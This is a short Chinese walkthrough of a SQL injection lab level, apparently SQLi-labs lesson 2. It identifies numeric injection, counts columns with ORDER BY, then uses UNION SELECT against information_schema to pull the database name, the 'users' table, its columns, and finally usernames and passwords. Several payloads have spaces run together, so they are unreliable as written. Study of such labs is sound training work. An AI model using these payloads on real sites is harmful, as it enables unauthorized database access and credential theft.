传入?id=1 和传入 =2-1发现回显一样,而且传入 ?id=1’ 报错,所以属于 数字型注入 ,后面也没有东西需要注释掉,所以可以省略 --+
接下来可以和第一关一样
先判断里面有几列
?id=1order by3?id=1order by4
发现和第一题一样有三列
找数据库名->找表名->找字段
?id=-1 unionselect1,2,database()发现数据库名仍然是 security
接下来找 表名
?id=-1 unionselect1,2,group_concat(table_name)from information_schema.tables where table_schema='security'发现用户信息在名为 ‘users’ 的表里
->找里面字段数据
?id=-1 unionselect1,2,group_concat(column_name)from information_schema.columns wheretable_name='users'information_schema.columns里的table_name和information_schema.tables里的table_name是两个不同的table_name
?id=-1 unionselect1,1,group_concat(username,id,password)fromusers
到这里用户的信息就已经得到了,就能结束了